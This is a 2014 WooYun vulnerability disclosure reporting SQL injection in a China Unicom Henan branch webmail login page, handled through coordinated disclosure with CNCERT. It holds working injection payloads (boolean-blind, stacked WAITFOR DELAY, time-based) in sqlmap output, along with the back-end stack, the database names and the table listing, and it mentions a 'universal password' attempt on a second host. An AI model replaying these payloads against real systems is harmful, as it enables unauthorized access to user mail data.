当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-075141

漏洞标题:中国联通某分站存在SQL注入漏洞

相关厂商:中国联通

漏洞作者: 浮萍

提交时间:2014-09-05 16:24

修复时间:2014-10-20 16:26

公开时间:2014-10-20 16:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-05: 细节已通知厂商并且等待厂商处理中
2014-09-10: 厂商已经确认,细节仅向厂商公开
2014-09-20: 细节向核心白帽子及相关领域专家公开
2014-09-30: 细节向普通白帽子公开
2014-10-10: 细节向实习白帽子公开
2014-10-20: 细节向公众公开

简要描述:

首页全是电信和联通
我也来个联通

详细说明:

中国联通河南省分公司邮件系统
http://ha.mail.chinaunicom.cn/login.aspx

Snap70.jpg


账号输入admin'

Snap71.jpg


竟然报错

Snap72.jpg


抓包

Snap73.jpg


URL:http://ha.mail.chinaunicom.cn/login.aspx
POST data

__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTcxMDE3OTE2Mw9kFgICAw9kFggCAQ8WAh4Fc3R5bGUFDmRpc3BsYXk6YmxvY2s7ZAIDDxYCHwAFDmRpc3BsYXk6YmxvY2s7FgICBA9kFgICAQ9kFgJmDw8WAh4MRXJyb3JNZXNzYWdlBS3nmbvlvZXlpLHotKXvvIzor7fmo4Dmn6XnlKjmiLflkI3lkozlr4bnoIHvvIFkZAIFDxYCHwAFLGhlaWdodDozMDBweDt0ZXh0LWFsaWduOmNlbnRlcjtkaXNwbGF5Om5vbmU7ZAIHDxYCHglpbm5lcmh0bWwFKuS4reWbveiBlOmAmuays%2BWNl%2BecgeWIhuWFrOWPuOeJiOadg%2BaJgOaciWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFCWJ0blN1Ym1pdAUIYnRuQ2xlYXJxVtb5o3xQ7dC7ZEbP8ekoihb%2F6Q%3D%3D&__EVENTVALIDATION=%2FwEWBQK86KTMDwKl1bKzCQK1qbSRCwLCi9reAwKtkuWiCgD%2FHnmf%2FCEgrMwGNilWVVvtj5E5&txtUserName=a&txtPassword=a&btnSubmit.x=36&btnSubmit.y=7

漏洞证明:

我一般变post为get
拼写URL
好吧
就是这么长

Snap74.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: txtUserName
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLT
cxMDE3OTE2Mw9kFgICAw9kFggCAQ8WAh4Fc3R5bGUFDmRpc3BsYXk6YmxvY2s7ZAIDDxYCHwAFDmRpc3
BsYXk6YmxvY2s7FgICBA9kFgICAQ9kFgJmDw8WAh4MRXJyb3JNZXNzYWdlBS3nmbvlvZXlpLHotKXvvI
zor7fmo4Dmn6XnlKjmiLflkI3lkozlr4bnoIHvvIFkZAIFDxYCHwAFLGhlaWdodDozMDBweDt0ZXh0LW
FsaWduOmNlbnRlcjtkaXNwbGF5Om5vbmU7ZAIHDxYCHglpbm5lcmh0bWwFKuS4reWbveiBlOmAmuays+
WNl+ecgeWIhuWFrOWPuOeJiOadg+aJgOaciWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV
9fFgIFCWJ0blN1Ym1pdAUIYnRuQ2xlYXJxVtb5o3xQ7dC7ZEbP8ekoihb/6Q==&__EVENTVALIDATION
=/wEWBQK86KTMDwKl1bKzCQK1qbSRCwLCi9reAwKtkuWiCgD/Hnmf/CEgrMwGNilWVVvtj5E5&txtUse
rName=a' AND 8125=8125 AND 'rOiO'='rOiO&txtPassword=a&btnSubmit.x=36&btnSubmit.y
=7
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLT
cxMDE3OTE2Mw9kFgICAw9kFggCAQ8WAh4Fc3R5bGUFDmRpc3BsYXk6YmxvY2s7ZAIDDxYCHwAFDmRpc3
BsYXk6YmxvY2s7FgICBA9kFgICAQ9kFgJmDw8WAh4MRXJyb3JNZXNzYWdlBS3nmbvlvZXlpLHotKXvvI
zor7fmo4Dmn6XnlKjmiLflkI3lkozlr4bnoIHvvIFkZAIFDxYCHwAFLGhlaWdodDozMDBweDt0ZXh0LW
FsaWduOmNlbnRlcjtkaXNwbGF5Om5vbmU7ZAIHDxYCHglpbm5lcmh0bWwFKuS4reWbveiBlOmAmuays+
WNl+ecgeWIhuWFrOWPuOeJiOadg+aJgOaciWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV
9fFgIFCWJ0blN1Ym1pdAUIYnRuQ2xlYXJxVtb5o3xQ7dC7ZEbP8ekoihb/6Q==&__EVENTVALIDATION
=/wEWBQK86KTMDwKl1bKzCQK1qbSRCwLCi9reAwKtkuWiCgD/Hnmf/CEgrMwGNilWVVvtj5E5&txtUse
rName=a'; WAITFOR DELAY '0:0:5'--&txtPassword=a&btnSubmit.x=36&btnSubmit.y=7
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLT
cxMDE3OTE2Mw9kFgICAw9kFggCAQ8WAh4Fc3R5bGUFDmRpc3BsYXk6YmxvY2s7ZAIDDxYCHwAFDmRpc3
BsYXk6YmxvY2s7FgICBA9kFgICAQ9kFgJmDw8WAh4MRXJyb3JNZXNzYWdlBS3nmbvlvZXlpLHotKXvvI
zor7fmo4Dmn6XnlKjmiLflkI3lkozlr4bnoIHvvIFkZAIFDxYCHwAFLGhlaWdodDozMDBweDt0ZXh0LW
FsaWduOmNlbnRlcjtkaXNwbGF5Om5vbmU7ZAIHDxYCHglpbm5lcmh0bWwFKuS4reWbveiBlOmAmuays+
WNl+ecgeWIhuWFrOWPuOeJiOadg+aJgOaciWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV
9fFgIFCWJ0blN1Ym1pdAUIYnRuQ2xlYXJxVtb5o3xQ7dC7ZEbP8ekoihb/6Q==&__EVENTVALIDATION
=/wEWBQK86KTMDwKl1bKzCQK1qbSRCwLCi9reAwKtkuWiCgD/Hnmf/CEgrMwGNilWVVvtj5E5&txtUse
rName=a' WAITFOR DELAY '0:0:5'--&txtPassword=a&btnSubmit.x=36&btnSubmit.y=7
---


web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


数据库

available databases [5]:
[*] EXCHANGE
[*] master
[*] model
[*] msdb
[*] tempdb


Database: EXCHANGE
[20 tables]
+---------------------------+
| AdminUsers |
| AutoForward |
| Contacts |
| Contacts_20130514_all_bak |
| Contacts_20130801_back |
| CustomGroup |
| DomainContacts |
| LockUsers |
| LoginErrorCount |
| MailBox |
| Orgs |
| ReportConfig |
| ReportPeriod |
| RootGroup |
| SMSConfig |
| Signature |
| Subscription |
| TimerMailAttachments |
| TimerMails |
| UserStatistic |
+---------------------------+


还有
http://ha.mail.cnc.cn/login.aspx
和这个一样

Snap75.jpg


输入万能密码提示 账号锁定

Snap76.jpg

修复方案:

版权声明:转载请注明来源 浮萍@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-09-10 09:00

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给河南分中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论